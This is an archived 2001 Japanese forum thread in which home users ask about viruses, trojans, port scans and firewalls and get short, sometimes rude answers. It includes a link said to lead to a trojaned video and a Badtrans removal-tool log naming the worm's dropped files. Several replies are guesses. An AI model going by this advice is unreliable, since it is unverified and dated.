心配だったらネット繋いでないときはケーブル抜け
それかファイヤーウォール立てろ

423 :名無しさん@お腹いっぱい。:01/12/30 03:52
2chの板でクッキーをオンにしないと書き込めない所があるけど、
どういう理由でそうしてるの?セキュリティ上の理由?

424 :名無しさん@お腹いっぱい。:01/12/30 03:57
>>423
そういう仕様だ

425 :名無しさん@お腹いっぱい。:01/12/30 04:01
>>421
ルーター使え。あるのと無いのとじゃ、ぜんぜん違う。

426 : :01/12/30 04:28
http://www.em5000.com/unsub.php?client=thebvg&email=thebvg@lists.thebvg1.net

427 :名無しさん@お腹いっぱい。:01/12/30 07:50
>>424
う〜む。

428 :名無しさん@お腹いっぱい。:01/12/30 07:53
BackdoorSubSevenに感染してしまいました・・・。
ファイルを削除しようとしてもWINDOWSのフォルダに入ってしまい
削除できません。削除禁止になってるってゆうような文が出るんですが
どうやって削除すればいいんでしょうか?

429 :コーネリアス:01/12/30 08:04
ルータの話がでているのでお聞きします。
コレガのルータを買ってきましたBAR-SW4P
簡易ファイアーウォールとしても使えるってことなんですけど
この【簡易】って言葉に引っかかっています。
つまり相手が初級ハッカーなら大丈夫
中級ハッカーなら分からない
上級ハッカーなら確実に侵入されると言うことなんでしょうか?

430 :       :01/12/30 08:08
>>428
ここは見たかい?
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.subseven22.html

431 :名無しさん@お腹いっぱい。:01/12/30 08:24
>421
>じゃ、ブラウザを立ち上げてネットしている、とかではなければ、
>PC立ち上げていても、不法浸入は大丈夫なんですね。

モデムの電源がONになっている以上PCを立ち上げた瞬間にマシンは
オンライン状態だ。ブラウザが起動してるか否かは関係ない。
PCの電源切るまでいつでも不正アクセス可能。何も安心できない。
勝手に安心してのほほんとしているのは本人の自由だがな。

432 :sala会員:01/12/30 08:32
salaが1月よりグローバルIPアドレスが利用できる
グローバルコースを開始するみたいなんですが
自分はネットゲームとかしないんで、そういう場合は
セキュリティの面からは従来からのプライベートアドレスの
コースでインターネットやってる方が安全でしょうか?

433 :名無しさん@お腹いっぱい。:01/12/30 09:10
>>429
説明書どおりの機能しかないってことじゃないかな

434 :名無しさん@お腹いっぱい。:01/12/30 09:12
>>432
プライベートだからっていってもネットに繋げることに変わりはないんだが
ファイヤーウォールでも立てろ

435 :名無しさん@不安:01/12/30 09:14
すみません、今日何気にnetstat -anをやってみたら、(一部)

Proto  Local Address    Foreign Address    State
TCP   0.0.0.0:1234     0.0.0.0:0       LISTENING
TCP   自分のIP:1234    64.71.177.66:80    CLOSE_WAIT

というのがありました。ポート1234というと・・Ultor'sというトロイに感染
してるんでしょうか?接続先はbiwa38.he.netという所なんですが、
ここって何ですか?2chに関係してる所でしょうか・・。あと、この板に来たか
らかどうかわかりませんが、今度は上のポートが1234ではなく、1282になりました。

たまたま1234だったんでしょうか?よろしければ教えていただけないでしょうか。

436 :432:01/12/30 09:19
>>434
ZoneAlarmいれてますが
これで大丈夫でしょうか?

437 :名無しさん@お腹いっぱい。:01/12/30 09:19
>>435
ポートの説明は
http://www.murashima.matsudo.chiba.jp/mura/tcpip-port.htm
ここ

he.netは2ちゃんのサーバ
ウイルスだと思うんならウイルスチェックしとけよー

438 :名無しさん@お腹いっぱい。:01/12/30 09:19
>>436
使い方を間違ってなければそれでいい

439 :名無しさん@お腹いっぱい。:01/12/30 20:25
>>417=>>419 よ。>>431さんも言ってるが、安心したらイカンぞ。

はっきり言って >>420 の認識が間違っとる。
大手プロバイダ所有のユーザ用IP(ほとんど個人ばっかり)へ向けてわざわざ
ポートスキャン飛ばすのは、踏み台にできるマヌケな個人PCを探すためだ。
「個人PCが侵入されにくい」というのは、星の数ほどある個人PCの中で
自分のPCが選ばれる可能性は低いというだけであって、けっして
「侵入価値が無い=侵入されない」ではないぞ。

440 : :01/12/30 20:47
動画(mpg)にトロイって仕込めるんですか?asfは聞いた事が
あるのですが・・・ 半角板、ダウン板なんかに張られている
http://202.248.141.204/arika_download/mpeg/Death-Gm02.mpg
テトリスの神業がトロイと言う書きこみがあったのですが・・・

441 :名無しさん@お腹いっぱい。:01/12/30 21:00
>>440
危険そうなページに直リンするんじゃねえよ。

442 :名無しさん@お腹いっぱい。:01/12/30 21:56
>440
トロイについては知識が無いので何ともいえないが動画の中身自体は
一見の価値がある。とりあえず俺のノートン先生は無反応だった。
それで絶対安全だという訳ではないが一応報告。

443 : :01/12/30 22:03
<td><!--let codebase="http://chat.netlineis.com/vcclient/" archive="../COM/volano/WebVolanoChat.zip" code="COM.volano.WebVolanoChat.class" width="430" height="227" align="top"
<param name="cabbase" value="COM/volano/WebVolanoChat.cab"
<param name="color" value="#000000"
<param name="group" value="Free Chat"
<param name="text" value="english.txt" Sorry, but you are not running a Java Compatible Web browser. To take advantage of the latest Web software, <a href="http://cgi.netscape.com/cgi-bin/upgrade.cgi" download Netscape now</a .<br
<a href="http://cgi.netscape.com/cgi-bin/upgrade.cgi" <img src="graphics/netscape.gif" width="90" height="30" border="0" alt="Download Netscape Now!" </a
</appl--></td>

444 :名無しさん@お腹いっぱい。:01/12/30 22:27
はじめまして
どうやら感染した様です・・・W32.Badtrans
McAfeeVirusScan でやってみたらでてました・・・
削除しようとしたのですがそのときはできず2回目も検索したら
発見されませんでした・・・ これで大丈夫ですか?
ウナウナカイトウコウ

445 :名無しさん@お腹いっぱい。:01/12/30 22:38
>>444
シマンテックのオンラインスキャンやってみれ

446 :名無しさん@お腹いっぱい。:01/12/30 22:41
>>444
駆除ツールがあるからそれで駆除
今日はそれで回線を切ってくれ
対策ソフトを買ってくるまでネットにつないじゃダメ

447 :名無しさん@お腹いっぱい。:01/12/30 22:45
>>444
感染していたのか、単にウイルスファイルに反応していたのか
その文章ではわからないがInfectedフォルダにウイルスファイルは
隔離されていると思われ。

詳細は↓で勉強してくれ。
猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/1-9

448 :名無しさん@お腹いっぱい。:01/12/30 22:58
>>444-447
ありがと・・・やってみます・・・
いまウィルススキャンのコントロールをダウンロード してます
感染していたのか、単にウイルスファイルに反応していたのか
というのはウイルス検査でDドライブを検索したら虫が出てきたんです


449 :名無しさん@お腹いっぱい。:01/12/30 22:58
>>448
駆除が終わるまでレスはするな
こっちにまで迷惑がかかるからな

450 : :01/12/30 23:24
ところで443は何?

451 :タスケテ:01/12/30 23:27
昨日気づきました。ファイルは全てマイドキュメント以下にフォルダを作って管理してるんですが、
そこにあったtxtファイルが全て消えてしまったんです。デスクトップにおいてあったtxtも消えてしまいました。
txtの検索をかけても、わずかなtxtとクッキーが出てくるだけです。再起動しても同じでした。

ウイルスソフトはマカフィーで、DATを最新の物にしてスキャンしましたが何も出ませんでした。
そこで、マカフィーを消してウイルスバスター2002の体験版を入れてスキャンしましたが、やはり何も出ませんでした。

最近あった不審な点は、Winの起動後しばらくすると何もしてないのにフロッピードライブにアクセスしようとすることです。
怪しいのは、その前に半角板でトロイ系のブラクラを2回ほど踏んだ事です。
その時に一応マカフィーでスキャンして感染ファイルの削除はしました。

もうリカバリの準備は済んでいるんですが、スキャンしても何もでないというだけあって不安です。
もしもバックアップファイルに潜んでいたら・・・
このウイルス(ワーム?)か不具合について何か知ってる人がいたら教えてください。
OSはMeで一度もアップデートやパッチを当てたりしていません。

452 :名無しさん@お腹いっぱい。:01/12/30 23:31
結果報告します。
ウィルス検出スキャンの結果
80876 個のファイルをスキャンし 0 個のファイルが感染していました。
メモリ上でウィルスは見つかりませんでした。
とのことでした。
皆さんお騒がせしてすいませんでした・・・
単にウイルスファイルに反応しただけだったのかな・・・
しかしなんだったのかな・・・

453 :名無しさん@お腹いっぱい。:01/12/30 23:40
>>451
ウイルス対策ソフトの製品版を購入してバックアップ含め
スキャンするのがいいと思われ。

>マカフィーでスキャンして感染ファイルの削除
ウイルスの名前はわからないの?
スキャンログは残っていないのか。

454 :名無しさん@お腹いっぱい。:01/12/30 23:42
>>450
気にするな

>>451
ウイルスはHDDをフォーマットすればたいていは消える
プリインストール版のマカフィーなら削除してノートンかバスターを買え
体験版じゃだめだ

455 :名無しさん@お腹いっぱい。:01/12/30 23:43
>>452
あんた誰だ

456 :名無しさん@お腹いっぱい。:01/12/30 23:44
>>455
448っす

457 :タスケテ:01/12/30 23:47
>>453
マカフィーは既にアンインストールしてしまいました。トロイの木馬の一種だった事しか覚えてません。

>>454
やはりそうですよね。他のスレで何がいいかよく吟味します。

458 :名無しさん@お腹いっぱい。:01/12/30 23:49
>>456
じゃあ今日はもう寝なさい
明日は大晦日だが電気店は開いてるだろう
対策ソフトを買って来い

459 :名無しさん@お腹いっぱい。:01/12/30 23:51
一ヶ月前ぐらいから、


発信者: _ta-hoge@d8.dion.ne.jp
題名: Re:

みたいなウイルスが送られてくるんですけど、
なんだかわかります?

ちなみにそのまま返信すると、もどってきて
アンダバーを外すと、ウイルスに感染した人にメールが遅れるみたいです。

面倒だからそのままにしてるけど、
きちんとウイルスに感染してますよっておしえた方がいいかな?

460 :名無しさん@お腹いっぱい。:01/12/30 23:55
>>459
かちゅーしゃ使い?
一ヶ月前から2chの各ページのトップに↓の警告が出てるよ。

W32.Badtransウイルス大流行です。

461 :名無しさん@お腹いっぱい。:01/12/30 23:55
>>458 いえっさーー
ごめいわくをかけました。
448っす

462 :名無しさん@お腹いっぱい。:01/12/30 23:56
>>459
W32.Badtrans.B@mm

463 :名無しさん@お腹いっぱい。:01/12/31 00:03
>>460,462
サンキュです〜。

464 :名無しさん@お腹いっぱい。:01/12/31 00:18
どうも、初めまして。
ウィルスにやられたっぽいので、原因や対処法をご存じの方がいらっしゃいましたらご教授下さい。

・Windowsの起動時にテキスト文書ファイルが削除される
・ノートンアンチウィルス2001のウイルス定義ファイルが保存されない

何度か3MBくらいの更新ファイルをインストールしましたがOS再起動のコマンドも出ませんでしたし、
OSを再起動して(当然.txt消えました)LiveUpdateを実行すると、また更新ファイルが3MBありました。
LiveUpdateした直後に全ファイルスキャンもしてみましたが、ウィルスは見つかりませんでした。

465 :名無しさん:01/12/31 00:21
>>464
オンラインスキャンはどうかな?

466 :名無しさん@お腹いっぱい。:01/12/31 00:22
464ですが、OSの起動時にFDDも鳴らしてくれますので、FDのテキスト文書も検索しているみたいです。

467 :名無しさん@お腹いっぱい。:01/12/31 00:30
>465さん
ウィルスバスターオンラインにつないでみましたが、
ActiveXがどうたらこうたらで実行できないみたいです・・・
うぁぁぁぁぁ。

468 :タスケテ:01/12/31 00:33
>>464
451,457を書いたものです。同じだね。全く。txtの消滅,起動時のフロッピーの作動。ノートン先生は入ってないけど・・・
テキストファイルは全部消えた?検索で「.txt」でクッキーとか何件かはヒットしない?
最近ブラクラ踏んだりしなかった?

469 :464:01/12/31 00:39
>468
.txt検索、やってみました。
(正直、検索した先から消されそうで怖かったですが・・・)
すると、

既定@valuecommerce[2]

などの「既定〜」というファイルがやたらと出てきました。
いくつかの.txtファイルも無事でしたので、開いた先から消していくウィルスなのかな?
どうやら常駐っぽいので、ヤヴァいことしたかも・・・

470 :タスケテ ◆XaX2tWBc :01/12/31 00:40
>>469
それは多分クッキーだと思います。やはりクッキーは消さないみたいですね。
現在裏でウイルスバスターオンラインを動かしています。何か見つかるといいけど・・・

471 :名無しさん@お腹いっぱい。:01/12/31 00:53
>>470
どんなブラクラだったの?
ソースきぼんぬ

472 :464:01/12/31 00:58
>470
お願いします。

しかし、最近のレスくらい見ろよ、自分・・・
原因はおそらくタスケテ氏と同じく、半角画像掲示板で謎のjpgファイルを見たからですね。
シマンテックでオンラインスキャンできそうなのでやってみます。

473 :名無しさん@お腹いっぱい。:01/12/31 01:05
ペグ?? さらに詳しい情報きぼんぬ

474 :タスケテ ◆XaX2tWBc :01/12/31 01:05
>>471
半角で、画像を見ようとして。開いたとたん、OutlookExpressのメールの送信ウインドウがたくさん開き始めた。
宛先はアドレス帳からランダムに。2回も引っかかってしまった。

>>472
今終わりました。何も出ませんでした。

HDぜんぶ消去した上ズタズタに!!ウィルス
http://pc.2ch.net/test/read.cgi/sec/1001662997/
の59を見てみてください。もしかするとこういうタイプのウイルスなのかもしれません。
起動時にフロッピーが動作する事を考えてもこのタイプが一番怪しいです。

475 :464:01/12/31 01:09
とりあえず応急処置はできました。
「スタート」
→「ファイル名を指定して実行」を選択して「MSconfig」と入力
→MSconfigで起動オプションを選択
→「スタートアップグループの項目を読み込む」のチェックを外す

で再起動したところ、デスクトップのテキストファイルは残りました。

476 :タスケテ ◆XaX2tWBc :01/12/31 01:26
>>475
これで一応大丈夫なんですか?
でも駆除方法や感染するファイルのタイプがわからないのは困りますよね。
今日はもう遅いからリカバリは明日かな。

477 :名無しさん@お腹いっぱい。:01/12/31 01:57
464ですが、どうやら
http://ton.2ch.net/sec/kako/997/997350129.html
にある

688 名前: 名無しさん@お腹いっぱい。 投稿日: 01/09/10 11:20

ウイルスチェックに引っかからないのは、厄介だね。
ウイルスよりも、もっと単純なものなのかもしれないね。
単に、スタートアップに勝手に登録される、フォーマットプログラム、
ってだけかもしれん。

というのが正解みたいですね。
プログラム本体を突き止めるには
「START and STOP」 などのスタートアップ監視ソフト
が必要みたいです。
・・・やっぱりシェアかな?

478 :名無しさん@お腹いっぱい。:01/12/31 02:04
なお、475で自分が書いた応急処置は
「スタートアッププログラムを起動させない」
というだけのものですので、根本的な解決にはなりません。
>「START and STOP」 などのスタートアップ監視ソフト
があれば何を起動させているかわかりますので、削除も可能ですね。

>471,473
自分の感染源は半角画像掲示板にアップされていたブツ(すでに流れているでしょう)である可能性が高いです。
・何度も同じURL(biglobeのどこか)に接続しようとしたjpgファイル
・きちんと解凍できなかった圧縮ファイル
のいずれかだと思われますね。
MXはやってないので。

479 :名無しさん:01/12/31 02:45
誘導されてきました。
チャットをやってて、IPを抜かれました。
なんかYBBとかいってました。
それで、なんかお気に入りYは2ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかIPが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

480 :名無しさん@お腹いっぱい。:01/12/31 02:47
>>479
お前何やってんの
マルチもいい加減にしろよ!

ネタでやってるのか?

481 :名無しさん:01/12/31 02:49
>>480
違います、PC板だったかなで
聞いたのですが、これはセキュ板の話っていわれました。
ネタではありません。深刻です。
ずっと悩んで、寝てないです。

482 :名無しさん@お腹いっぱい。:01/12/31 02:52
>>481
誰も言ってねーよ アホ
マルチに回答するほど無駄なことはねーんだよ
勝手に自分で悩んでろ
ストーカーにでも襲われてろ

483 :名無しさん:01/12/31 02:56
>>481
ゴメンなさい。
http://pc.2ch.net/test/read.cgi/win/1009622025/433
です。時間帯を確認してください。

484 :名無しさん:01/12/31 02:59
>>482
でした。間違えました。

485 :名無しさん:01/12/31 03:05
反省してます。

486 :名無しさん:01/12/31 03:07
これから、反省文を書きます。

487 :名無しさん:01/12/31 03:08
私は、マルチがそんなにいけないこと
と知らず、してしまった。本当に情けない。
本当に、申し訳ない。悪かったです。

488 :名無しさん:01/12/31 03:14
お願いします。教えてください。

489 :ディオ:01/12/31 03:19
SSLで保護されたページに入って次のページにいこうとすると
「SSLで保護されたページから抜けようとしています」とでます。
これはみなさんそうなのでしょうか?ウイルスバスターのファイアーウォールの
セキュリティレベルを最高にしているからなのでしょうか?
初心者の糞みたいな質問ですみませんが、知っている方がいたら教えてください。

490 :名無しさん@お腹いっぱい。:01/12/31 03:20
>>489
抜けようとしてるならそう
ウイルスバスターとかは関係無し

491 :名無しさん:01/12/31 03:21
あぁ、違った。私は、待ちます。眠いです。
しかし、私には守るべき家族がいる。

492 : :01/12/31 03:23
>>491
てか、ネタか(w
マジレスしようとした俺が馬鹿だった。
糞して寝よっと。

493 :名無しさん:01/12/31 03:27
>>492
ネタじゃありません。
もう寝てる時間です。
疲れた。まぶたが・・・

494 :名無しさん:01/12/31 03:28
あと、5分まって、こなかったら他で聞きます。
マルチはしたくないです。
嫌われます。教えてください。

495 :名無しさん:01/12/31 03:32
教えてください。

496 :名無しさん@お腹いっぱい。:01/12/31 03:37
>>479
大抵はハッタリなんだけどね。
IP云々よりカキコから推理されることが多いと思われ。

497 :496:01/12/31 03:39
YBB?
なら、あり得るかも。

498 :名無しさん:01/12/31 03:42
>>496
でも、さっきからチャットをロムで見張っていたら
URLがかかれたので、見てみたら管理者専用の者、
IPと時間が乗ってる奴がでてきたんですよ。
でも、それは更新できないから、一回一回更新するやつなんですけど、
書きの内容からは多分無理でしょう。
でも、可能なんですよね。進入するのは?

499 :名無しさん:01/12/31 03:45
>>497
プロバイダーはvillage.infowebここなんですけど、
ヤフーと関係ないですよね。

500 :名無しさん@お腹いっぱい。:01/12/31 03:47
>>487
良く言った、感動した

629 名前:名無しさん E-mail: 投稿日:01/12/31 03:36
チャットをやってて、IPを抜かれました。
なんかYBBとかいってました。
それで、なんかお気に入りYは2ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかIPが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

もういいっつうの

501 :名無しさん@お腹いっぱい。:01/12/31 03:49
>>499
それを早く言ってくれ。
ハッタリの可能性大。もっともinfowebのことはよく知らんが。

まあ、将来のためにもセキュリティ対策はしっかりやっておけ。

502 :名無しさん:01/12/31 03:51
でも、IPは一体どうやって抜いたのですか?
身の安全の保障はされたのですか?
寝てもいいのですか?

503 :名無しさん@お腹いっぱい。:01/12/31 04:03
てか・・オマエは俺が危険だと言ったら危険だと思ってガタガタして
安全だと言ったら安心して寝るのか? なぁ?ここで出ている情報に
根拠があるものがあると思うか?


追伸 IPアドレスをIPと略すのは止めてください。あほ丸出しです。

504 :名無しさん:01/12/31 04:04
ねむい

505 :名無しさん@お腹いっぱい。:01/12/31 04:04
>>502
>>498はそれらしいようにも見えるが…
わかりにくい日本語でかいてあるのでなんとも言えない。

しかしWin板で結構レスもらってるようだな。

506 :名無しさん@お腹いっぱい。:01/12/31 04:08
皆様。マルチを相手にするのはやめましょう。板の質が下がります。

507 :名無しさん:01/12/31 04:09
寝ます。アドバイスがあったら書いといてください。
必ず見ますので。よろしくお願いします。

508 :435:01/12/31 04:53
>>437
遅くなりましたが、ありがとうございました。

ところでポート1025って常にListenなんですが、これって何でしょうか?
>>437さんが載せてくれたページで見てみたらblackjackとなってました。
検索してもわかりませんでした・・OSはWin98SEです。

509 :名無しさん@お腹いっぱい。:01/12/31 05:34
Yahoo!BBでIPアドレスが固定されていたのですが、
VMWareなどの仮想マシンにOSをインストールして
ネットワークの設定をしたところ、
ゲストOSにIPアドレスが割り振られたあとに
ホストOSのIPアドレスも変わってしまいました
これはどういうことなんでしょうか?

510 :名無しさん@お腹いっぱい。:01/12/31 05:40
>>509
プライベートアドレスが割り振られたんじゃないのか?

511 :名無しさん@お腹いっぱい。:01/12/31 05:44
ZoneAlarmブロックデータは、インターネットの上に、
IPアドレスが202.117.96.15であるリモートのコンピュータのポート3869からあなたのマシンのポート80に送りました。この通信試みがポートスキャンであったかもしれないこと単にインターネットの上で定期的に発せられる嘆願されないコマーシャルのうちの数百万のうちの1つ
またはネットワークコントロールメッセージ。そのような嘆願されないメッセージはしばしばインターネットバックグラウンドノイズと呼ばれます。

こんな形でポート80のスキャンが異様に多いのですが
なんですか?

512 :名無しさん@お腹いっぱい。:01/12/31 05:46
>>511
それは80がWebサーバとして使う決まりとなってるからだよ

513 :名無しさん@お腹いっぱい。:01/12/31 05:48
>>510
もとのIPアドレスに戻すことはできるのでしょうか?

514 :名無しさん@お腹いっぱい。:01/12/31 05:50
>>512
ほーそなんですか
目的がわかりませんが しかとですね。

515 :名無しさん@お腹いっぱい。:01/12/31 05:52
フレッツADSLは固定IPじゃないから気楽だよ、ヤフーは固定なのか あらま

516 :名無しさん@お腹いっぱい。:01/12/31 05:56
Nimda等が入れるか入れないかに関係無く、攻撃をしかけようとしてるのだと思われ
apacheたてると良くわかる...
ありもしないexeファイルを探ろうとする。

517 :名無しさん@お腹いっぱい。:01/12/31 05:56
>>513
VMwareって使ってないからどういう風にIPアドレスが割り振られるのか
わからんっす ごめんね
ゲストとかホストって書いてあるの要するにOSが2つ入ってるってことなのか?

518 :名無しさん@お腹いっぱい。:01/12/31 06:19
OS Win98SEで通信環境はフレッツISDNでダイヤルアップルータを使用しています。
ウィルスバスター2001を入れてて簡易パーソナルファイヤーウォールなる
ものがついていたので大丈夫だと思っていたのですが
ZoneAlarm等のソフトを入れておかないと安全とは言えない環境でしょうか?

519 :名無しさん@お腹いっぱい。:01/12/31 06:22
いや、ホストOSは実マシンのOSで、
そのOSにVMWareをインストールすることで
仮想マシンが構築できるわけですが、
その仮想マシンにインストールするOSが
ゲストOSです。

520 :名無しさん@お腹いっぱい。:01/12/31 06:23
>>519>>517へのレスです

521 :名無しさん@お腹いっぱい。:01/12/31 06:24
>>518
ファイヤーウォールソフトは1つでよい
2つ建てると誤作動を起こすぞ

522 :名無しさん@お腹いっぱい。:01/12/31 06:25
>>519
YBBって絶対固定だったっけ?
どっかの書き込みで変わることもあるってのを見たことはあるんだが

523 :518:01/12/31 06:30
>>521
レスありがとうございます。
という事は現在のウィルスバスターだけで
ZoneAlarmのような役目は果たしてくれてるという事でしょうか?
ウィルスバスター2001の「パーソナルファイアーウォールの
不正進入のログ」というものをさきほどはじめて見て
かなりの数の不正進入があるような記述だったので不安になったのですが
これはログに残っているだけで、きちんとブロックしてくれているのでしょうか?

524 :名無しさん@お腹いっぱい。:01/12/31 06:33
>>523
http://www.trendmicro.co.jp/product/vb2002/images/scr_pfw.gif
これでしょ?
ちゃんと設定をしてれば大丈夫だよ

525 :518:01/12/31 06:39
>>524
ありがとうございます。
そうです。2001なんで少々画面が違いますが
パーソナルファイアーウォールを有効にするにはチェックを入れています。
ただその下のセキュリティーレベルを設定するバーがないのですが
問題ありませんか?

526 :名無しさんに接続中…:01/12/31 06:56
MLMJLMML.EXEって添付ファイルのついたメールが来た・・・
検索しても何も引っかからない・・・
新種?

527 :名無しさん@お腹いっぱい。:01/12/31 07:00
>>525
バーはないかもしれないけど設定方法はあるでしょ
説明書をよく読んでくれ

528 : :01/12/31 07:11
この板、トロイが仕込まれたスレがちょこちょこありません?

529 :詳しくないけど:01/12/31 07:22
の、ソースでしょ?

530 :助けて君:01/12/31 08:59
先日から表示がおかしいんです。
とくてい文字の後ろに
に長いスペースが勝手に入ってしまうんです。
例えば「たしろ」を変換すると、
田代
のようになってしまいます。
一文字としてです。(代の前にカーソル置いて
バックスペースすると、一回で田
まで消える。)
ブラウザで見ても同じようになって、表示がめちゃくちゃ。

ウィルスかと考えてウィスルバスター2002昨日買ってきて
最新版で
にアップデートしてスキャンしたけどチェックされなかった。
原因わかる人教えて下さい。
win98、3年前のlavieです。

531 :助けて君:01/12/31 09:12
530です。
書き込む時は「田                代」
のようになるのですが、今530見たら間のスペースが消えていました。

いろんな板見て探したいのですが、ブラウザがうまく見れないので
よろしくお願いします。

532 :名無しさん@お腹いっぱい。:01/12/31 09:13
田代
で、代の前にカーソル→バックスペース
お〜!! 俺も「田」が消えたぞ?
ウイルスなのか?!恐ゎ〜い!

533 :532:01/12/31 09:14
あ、なんだ。違うのか(ワラ

534 :532:01/12/31 09:17
>>531
辞書ファイルが壊れてるだけじゃないの?

535 :助けて君:01/12/31 09:34
ATOK使っていて、再インストールしました。
IMEでやっても同じなんです。ブラウザも、
テキスト部分は文字間隔がめちゃくちゃで
まともに読めません。
原因がわからなくて途方にくれています。

536 :名無しさん@お腹いっぱい。:01/12/31 09:36
>>535
レジストリがいかれてんのかもな?
スキャンしてみな

ブラウザが変なのは別の原因かも
ブラウザも再インストールだ

537 :名無しさん@お腹いっぱい。:01/12/31 09:37
田代をおもしろ半分に茶化すからだよ

538 :名無しさん@お腹いっぱい。:01/12/31 09:41
>>537 の意見に一票!

539 :名無しさん:01/12/31 10:12
串をつくりたいのですが串とは具体的にどのような役目をはたし
どこでつくれるのでしょう。

540 : :01/12/31 10:14
>526
ハイブリス

>535
スキャンディスクして、解決しなかったら、ブラウザ再インストール
それでダメならOS再インストール。たぶんセキュリティとは無関係

>539
検索とかした?

541 :名無しさん@お腹いっぱい。:01/12/31 10:58
ファイアウォールは 166.114.27.*** (TCP Port 3335) [TCP Flags: S]. から、
このコンピュータ (NetBIOS Session) への インターネット アクセスをブロックしました。

これは不正アクセス?
フォルダは何も共有してないんだけど。

542 :名無しさん@お腹いっぱい。:01/12/31 11:27
>>541
アタックじゃないの?

543 :名無しさん@お腹いっぱい。:01/12/31 11:41
>>541
なぜ不正アクセスだと思うのか理由を述べよ。

544 :名無しさん@お腹いっぱい。:01/12/31 12:12
>>541
詳しく書かないとどうしようもない。

セキュ板から流れてきたなお前。ネタか?

545 :名無しさん@お腹いっぱい。:01/12/31 12:18
>>544
ここセキュ板だよw

546 :544:01/12/31 12:19
>>541
うわー
まじでスマン、誤爆&勘違い。掃除して逝ってくるわ。

547 :544:01/12/31 12:21
>>545
重ね重ねにスマンカッタ。

548 :名無しさん@お腹いっぱい。:01/12/31 12:30
むしろ相手はNBSessionに何の用があったのか?

549 :名無しさん@お腹いっぱい。:01/12/31 12:48
暮れのご挨拶

550 :名無しさん@お腹いっぱい。:01/12/31 13:23
田代ウィルス・・・

551 :名無しさん@お腹いっぱい。:01/12/31 13:27
ケーブルなんですが串を刺すことができません。だれかたすけてください。

552 :名無しさん@お腹いっぱい。:01/12/31 13:34
お願いします。初心者です

553 :名無しさん@お腹いっぱい。:01/12/31 13:35
>>551
串させないぐらいで大袈裟すぎ
ケーブルの会社で制限してるんじゃないのか?

554 :名無しさん@お腹いっぱい。:01/12/31 13:38
てことはつまりできないってことですよね。
無念。どうもありがとうございましrた。

555 :名無しさん@お腹いっぱい。:01/12/31 14:24
catvのprivate ipなんだけどfw導入する必要ある?

556 :名無しさん@お腹いっぱい。:01/12/31 14:49
464で「テキストファイルが消される」と書いた者ですが、
Start and Stopを入れたところ
FDD作動の原因はWininits.LGC(2001/12/28更新)
であることが判明しました。
Start and StopでWininitsをStopすれば大丈夫そうです。

また、実はStart and Stopのインストール前に
BadTransワームの駆除ソフト(Fix_Badt)を使ったんですが、
それ以降デスクトップのテキストファイル削除が行われなくなりました。
よって実際にテキストを消しているのはこのワームなのかもしれません。

557 :名無しさん@お腹いっぱい。:01/12/31 14:50
あと、「Wininits」がWinMeの作動に必須のファイルみたいなので消去してないんですが、
修復方法などご存じの方がおられましたらレクチャーお願いします・・・

558 :名無しさん@お腹いっぱい。:01/12/31 14:54
しかし、ノートン先生のスキャンもくぐり抜けるとは・・・
「HD全部〜」のスレのウィルスといい、無敵じゃないってことですな。
気を付けないと・・・

559 :名無しさん@お腹いっぱい。:01/12/31 15:08
超マイナーなウイルスだったらいちいち対応しないかもしれないからね

560 :名無しさん@お腹いっぱい。:01/12/31 15:19
soniknapからファイル落とせないんですけど
特別な条件がいるのでしょうか?
単に相性の問題でしょうか?

561 :名無しさん@お腹いっぱい。:01/12/31 15:23
>>560
それってファイル交換系ソフトか?
あやしいのでオレはアドバイスを避ける

562 :名無しさん@お腹いっぱい。:01/12/31 15:26
しかも板違いな気がする

563 :560:01/12/31 15:36
>>561-562
板違いですね、失礼しました。

564 :名無しさん@お腹いっぱい。 :01/12/31 16:37
教えてください。
W32.Badtransウイルスに感染したままで
海外の有料サイトなどに入会する為にクレジット
カ−ドの番号を入力したら確立的に
ほぼ100パ−セントヤバイことになるのでしょうか?
初心者なものでわからないのです。
誰か分かる方教えてください。

565 :名無しさん@お腹いっぱい。:01/12/31 16:40
>>564
ヤバイだろうね
感染したままネットに繋ぐ精神状態が理解できないけど

566 :名無しさん@お腹いっぱい。:01/12/31 16:43
>>564
もうやっちゃったの?つーか感染したままでネット
する事自体100%ヤバイ事なんですが。

567 :566:01/12/31 16:44
かぶった。ごめそ。

568 :564:01/12/31 16:58
>565、566
いえ一度感染しましたが駆除しました。
でも感染時にクレジットカ−ドを使用したような
気がするのです(不確かですが)。

569 :名無しさん@お腹いっぱい。:01/12/31 16:59
>>568
キーログを送信しちゃうからヤバイよ
心配ならクレジットカード会社に連絡を

570 :名無しさん@お腹いっぱい。:01/12/31 17:55
毎度〜お騒がせの〜464で〜ございま〜す。
件のウィルスですが、ノートン先生の12/29更新版ではひっかからないようです。
Fix_BADTのログをコピペしてみましたが、カーネルおじさんが何か関係あるんでしょうか?

================================================================
Start : FIX_BADTRANS version 1.10
Windows Platform : Windows ME
Tool configuration:
Scan Files: Yes
Quiet Mode: Yes
Date and Time: Mon Dec 31 00:42:12 2001

I. Terminating Worm/Virus processes.
*** Infected processes were NOT found. ***

II. Cleaning System Registry.
WORM_BADTRANS.B not found in the SYSTEM REGISTRY

III. Removing drop files.
File "C:\WINDOWS\SYSTEM\kernel32.exe" not found
File "C:\WINDOWS\SYSTEM\kdll.dll" not found
File "C:\WINDOWS\SYSTEM\cp_25389.nls" not found

IV. Inoculating the system.
Creating [KERNEL32.EXE]. Folder created.
System Inoculated

Stop
Date and Time: Mon Dec 31 00:42:16 2001
================================================================

571 :名無しさん@お腹いっぱい。:01/12/31 18:01
あと、Wininits.LGCは

何度かWininits.exeを実行
→JustSystem(ATOKなど)の.exeを実行
→最後にKERNEL32.exe

というふうになっていました。
このファイルがどんどん付け足していくタイプのものなら、
KERNEL32が原因(→Fix_Badtで駆除すればOK)ということなのでしょうが・・・
ご意見をお願いします。

572 :名無しさん@お腹いっぱい。:01/12/31 19:45
>>570
そのログ見るかぎり、
「どこにもBadtrans.bはありませんでした」
と書いてあるようにしか思えないのだが…?

Badtrans.b に感染したマシンを狙った
単独実行ファイルか別種のウイルスじゃないか?

573 :名無しさん@お腹いっぱい。:01/12/31 20:42
>>412
